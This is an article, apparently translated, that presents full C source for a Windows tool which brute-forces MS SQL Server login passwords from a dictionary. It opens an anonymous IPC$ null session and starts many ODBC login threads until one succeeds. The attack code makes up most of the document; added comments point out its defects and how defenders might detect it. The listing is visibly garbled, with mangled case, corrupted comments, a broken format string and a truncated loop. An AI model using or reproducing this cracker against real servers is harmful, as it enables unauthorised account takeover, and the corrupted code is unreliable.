Remotely detecting MS SQL Server account security

ODBC is the abbreviation for Open Database Connectivity, a uniform interface standard for accessing remote databases (primarily relational databases). In practice, ODBC takes the form of a database access library that exposes a set of ODBC API functions to programmers. For a programmer, the ODBC API function set is effectively a set of dynamic link libraries (DLLs) that can be called directly from an application.

When an application calls the ODBC API directly to do database work, the process is fairly involved. It generally follows these steps:
<1> Start the ODBC database application.
<2> Establish an IPC session with the server.
<3> Create an environment handle for the database application.
<4> Create a connection handle.
<5> Connect to the data source.
<6> Create a statement handle.
<7> Execute the SQL operation using the statement handle created in the previous step.
<8> Release the statement handle.
<9> To perform further SQL operations, repeat steps 6-8.
<10> Disconnect from the database.
<11> Release the connection handle.
<12> Release the environment handle.
<13> Disconnect the IPC session.
<14> End the program.

The following example walks through this entire process, applied to checking an MS SQL Server account password remotely.

/**********************************************************
Module NAME:SQLCHECK.C
date:2000.12.14
WEB:www.patching.net
Notices:copyright (c) Eyas
**********************************************************/
#include
#include
#include
#include
#include
#include
#include
#include

////////////////////////////////////////////////////////////////////////
file://Define global variables
// Shared state used by main() and by every Sqlcheck() worker thread.
// NOTE(review): cracked, passwd and activethreads are written from worker
// threads and read by main() without any synchronisation, which is a data
// race; the semaphore below only throttles thread creation.
Char dict[20000][40],//word list loaded by Readdic(), one entry per row
username[40],//SQL Server login name (argv[2])
target[40],//server name or address (argv[1])
passwd[40];//word that produced a successful connection, set by Sqlcheck()
int total=0;//number of rows of dict[] in use
BOOL cracked=false;//set to true by the first Sqlcheck() thread that connects
HANDLE hsemaphore,//semaphore bounding the number of in-flight worker threads
hevent;//manual-reset event signalled when activethreads reaches 0
Long maxthreads,//thread limit from argv[4], validated to 1..100 in main()
activethreads;//derived in Sqlcheck() from the semaphore's previous count
////////////////////////////////////////////////////////////////////////
// Print the banner and the command-line usage for `pragname` (argv[0]).
// NOTE(review): the "usage:%s" line prints only the program name; the
// example line shows the four expected arguments (target, login, dictionary
// path, thread count), so the placeholders seem to have been lost in this copy.
void usage (char *pragname)
{
printf ("\npower by Eyas"
"\nhttp://www.patching.net"
"\N2000/12/14"
"\n\nusage:%s"
"\nexample:%s 192.168.0.1 sa c:\\pwd.dic 50\n", pragname,pragname);
Return
}

////////////////////////////////////////////////////////////////////////
// Load the word list at `dic` into the global dict[] table, one entry per
// line, and advance the global `total` by the number of entries stored.
// Returns 0 on success, 1 if the file cannot be opened.
int Readdic (char *dic)
{
FILE *FP;
Char tmp[40];

file://Open Dictionary File
if ((Fp=fopen (DIC, "R")) ==null)
{
printf ("\ncan ' t open%s", DIC);
return 1;
}

// fgets() reads at most 39 characters per call, so a longer line is split
// across consecutive dict[] entries rather than truncated.
while (!feof (FP))
{
file://reads data to a temporary variable
if (fgets (TMP,40,FP) ==null)
Break
// strlen(tmp)-1 is meant to drop the trailing newline.
// NOTE(review): a line without a trailing newline (typically the last line
// of the file) loses its final real character instead.
file://the last data read from the file [newline symbol]
strncpy (Dict[total],tmp,strlen (TMP)-1);
total++;
// Hard cap one row below the table size.
if (total>=19999)
Break
}
Fclose (FP);
return 0;
}
////////////////////////////////////////////////////////////////////////
// Connect to the \\remotename\ipc$ share with an empty user name and empty
// password (an anonymous "null session") through WNetAddConnection2.
// Returns 0 when the call reports NO_ERROR, 1 otherwise.
// NOTE(review): rn[30] receives "\\\\" + remotename + "\\ipc$" with no length
// check; main() passes argv[1], which it also copies into a 40-byte target,
// so a long name can overflow rn. From the defender's side this anonymous
// IPC$ connection is the first contact the tool makes with a host; it is the
// kind of event share/logon auditing can record, and disabling anonymous
// (null-session) access denies it outright.
int CONNIPC (char *remotename)
{
Netresource nr;
DWORD Flags=connect_update_profile;
TCHAR rn[30]= "\\\\",
Ln[5]= "";

strcat (Rn,remotename);
strcat (RN, "\\ipc$");

Nr.dwtype=resourcetype_disk;
Nr.lplocalname= (LPTSTR) &LN;
Nr.lpremotename= (LPTSTR) &RN;
Nr.lpprovider=null;

// Empty user name and password: no credentials are presented.
if (WNetAddConnection2 (&nr, (LPSTR) "", (LPSTR) "", flags) ==no_error)
{
return 0;
}
Else
{
return 1;
}
}
////////////////////////////////////////////////////////////////////////
// Tear down the \\remotename\ipc$ connection opened by CONNIPC(), forcing
// the cancel (fForce = true) and updating the user profile.
// Returns 0 when WNetCancelConnection2 reports NO_ERROR, 1 otherwise.
// NOTE(review): lpname[30] is built with unchecked strcat, same as rn[] in
// CONNIPC(); main() passes the 40-byte `target` buffer here.
int DELIPC (char *remotename)
{
DWORD ret;
TCHAR lpname[30]= "\\\\";

strcat (Lpname,remotename);
strcat (lpname, "\\ipc$");

Ret=wnetcancelconnection2 (lpname,connect_update_profile,true);
if (ret==no_error)
{
return 0;
}
Else
{
return 1;
}
}
////////////////////////////////////////////////////////////////////////
// Worker thread body: try one ODBC login to the global `target` as
// `username` with the candidate password `ppwd` (a pointer to one dict[]
// row). On success it sets the global `cracked`, copies the word into
// `passwd` and disconnects. Always returns 0.
// Every attempt is a complete login to the `master` database, so on the
// server side each failure is an ordinary failed login that login auditing
// (where enabled) records under this user name.
// NOTE(review): the three ExitProcess(1) calls below terminate the whole
// process from a worker thread; the __finally block is not reached and
// main() never sees the event.
DWORD WINAPI Sqlcheck (pvoid ppwd)
{
file://Define Local variables
Char szbuffer[1025];
Char *pwd;
Sword Swstrlen;
SQLHDBC HDBC;
Sqlhandle henv;
Sqlreturn RETCODE;//return value of the ODBC API calls
Schar connstr[200];//ODBC connection string built below
Long Previouscount;//semaphore count before ReleaseSemaphore()

file://gets the password that was passed over to prepare the probe.
pwd= (char *) ppwd;
// target, username and pwd are each at most 40 bytes, so the fixed text
// plus three values fits in connstr[200]; this relies on main() and
// Readdic() having NUL-terminated those buffers.
FILE://construct Connection Database characters
sprintf (ConnStr, "Driver={sql Server}"; server=%s; uid=%s; Pwd=%s;database=master ",
TARGET,USERNAME,PWD);
File://puts (CONNSTR);
__try{
FILE://Create the environment handle for database application
if (Sqlallochandle (sql_handle_env,sql_null_handle,&henv)!=sql_success)
{
printf ("\nallocate environment handle failed.\n");
ExitProcess (1);
}
file://setting up an ODBC version environment
if (SQLSetEnvAttr (Henv, Sql_attr_odbc_version, (Sqlpointer)
SQL_OV_ODBC3, Sql_is_integer)!= sql_success)
{
printf ("\nset the ODBC version environment attribute failed.\n");
Sqlfreehandle (sql_handle_env, henv);
ExitProcess (1);
}
FILE://Create a connection handle
if (retcode= sqlallochandle (sql_handle_dbc,henv, Sqlhdbc FAR
*) &AMP;HDBC))!= sql_success)
{
printf ("\nallocate connection handle failed.\n");
Sqlfreehandle (sql_handle_env, henv);
ExitProcess (1);
}
// No window handle is supplied, so the driver cannot prompt; the connect
// either succeeds with the given string or fails.
file://Connection Data source
Retcode= SQLDriverConnect (Hdbc,null,connstr,strlen (CONNSTR),
Szbuffer,sizeof (Szbuffer), &swstrlen,
sql_driver_complete_required);
if (retcode!=sql_success && retcode!= sql_success_with_info)
{
file://connection failed, function terminated
file://printf ("\ncouldn ' t connect to%s MSSQL server.\n", target);
}
Else
{
// Login accepted. NOTE(review): cracked and passwd are written here
// with no lock while main() polls cracked.
file://connection to remote MSSQL server database succeeded
Cracked=true;
strncpy (passwd,pwd,sizeof (passwd));
file://Disconnect
SQLDisconnect (HDBC);
}
}//end of __try
__finally{
FILE://Release Connection handle
Sqlfreehandle (SQL_HANDLE_DBC, HDBC);
FILE://release Environment handle
Sqlfreehandle (sql_handle_env, henv);
// Give the slot back to main(); Previouscount is the count before release.
ReleaseSemaphore (Hsemaphore,1,&previouscount);
// maxthreads - (Previouscount + 1) = threads still holding a slot.
activethreads=maxthreads-previouscount-1;
file://printf ("\nactivethreads-->%d.", activethreads);
// NOTE(review): hevent is manual-reset, so once signalled it stays
// signalled; if this thread finishes before main() has started the next
// one, activethreads reaches 0 early and main()'s final wait returns at
// once while later threads may still be running.
if (activethreads==0)
{
SetEvent (hevent);
}
}//end of finally
return 0;
}

////////////////////////////////////////////////////////////////////////
// Entry point. Arguments: argv[1] target, argv[2] login name, argv[3]
// dictionary path, argv[4] thread limit (1..100). Loads the dictionary,
// opens an IPC$ null session, starts one Sqlcheck() thread per word while
// bounding concurrency with a semaphore, waits for the workers, tears the
// session down and reports the result and elapsed time.
// Returns 0 on completion, 1 on argument, file, session or handle errors.
int main (int argc,char **argv)
{
HANDLE hthread;//Thread Handle
DWORD Dwthreadid,dwret;
int i=0,err=0;
clock_t start,end;//the start and end times of a program run
Double duration;

if (argc!=5)
{
Usage (argv[0]);
return 1;
}
// NOTE(review): strncpy with sizeof leaves target/username unterminated
// when the argument is 40 characters or longer; Sqlcheck() later formats
// both with %s.
FILE://get the target address, username
strncpy (target,argv[1],sizeof (target));
strncpy (username,argv[2],sizeof (UserName));
file://Obtain and check the maximum number of threads entered by the user
Maxthreads=atol (Argv[4]);
if ((maxthreads>100) | | (maxthreads<1))
{
Usage (argv[0]);
return 1;
}
file://read the words in the dictionary into memory
if (Readdic (argv[3])!=0)
return 1;
FILE://and Target Machine establish IPC session
if (CONNIPC (argv[1])!=0)
{
printf ("\ncan ' t built IPC NULL session!");
return 1;
}
Else
{
printf ("\nbuilt IPC NULL session success!\n");
}
// Initial count == maximum count == maxthreads: every slot starts free.
// NOTE(review): GetLastError() returns a DWORD; %d expects int (also below).
Hsemaphore=createsemaphore (Null,maxthreads,maxthreads,null);
if (hsemaphore==null)
{
printf ("\ncreatesemaphore () failed. errorcode:%d. ", GetLastError ());
return 1;
}
FILE://Create an event kernel object [manual reset, initial status is not notified]
Hevent=createevent (Null,true,false,null);
if (hevent==null)
{
printf ("\ncreateevent () failed. errorcode:%d. ", GetLastError ());
CloseHandle (Hsemaphore);
return 1;
}
file://Start the timer.
Start=clock ();
// NOTE(review): the loop header is truncated in this copy of the listing;
// the body indexes dict[i] and prints i+1 of total, so it presumably ran
// i from 0 to total-1.
for (i=0;i <>
{
file://probe password After successful jump out of this loop
if (cracked==true)
Break
file://Display Progress Information
printf ("\n[%d/%d]%s->%s->%s", I+1,total,target,username,dict[i]);
// Each worker receives a pointer to its own dict[] row.
Hthread=createthread (Null,0,sqlcheck, (PVOID) &dict[i],0,&dwthreadid);
file://to handle creating thread errors
if (hthread==null)
{
err++;
MessageBox (NULL, "Thread error", "Error", MB_OK);
if (err>=50)
Break
}
// NOTE(review): CloseHandle is also reached when hthread is NULL.
CloseHandle (Hthread);
Sleep (10);
// Take a slot *after* creating the thread, so the wait only blocks once
// all slots are held; the semaphore is released in Sqlcheck()'s __finally.
WaitForSingleObject (Hsemaphore,infinite);
}
// Wait up to 3 minutes (180000 ms) for the last worker to signal hevent.
Dwret=waitforsingleobject (hevent,180000);
Switch (dwret)
{
Case WAIT_OBJECT_0:
printf ("\nall thread done.");
Break
Case Wait_timeout:
printf ("\nwait Time Out.") Exit. ");
Break
Case wait_failed:
printf ("\nwaitforsingleobject () failed.");
Break
}
FILE://disconnects the IPC session with the target machine
DELIPC (target);
file://after successful probe password echo message
if (cracked==true)
printf ("\n\nsuccess!%s SQL Server User [%s] passwd is [%s].", TARGET,USERNAME,PASSWD);
file://the end of the mind
End=clock ();
file://Conversion Time Format
Duration = (double) (end-start)/clocks_per_sec;
file://Display the time used
printf ("\n\ncomplete.use%2.1f seconds.\n", duration);
return 0;
}
////////////////////////////////////////////////////////////////////////
The program compiles and runs in the Windows 2000 / VC++ 6.0 environment.


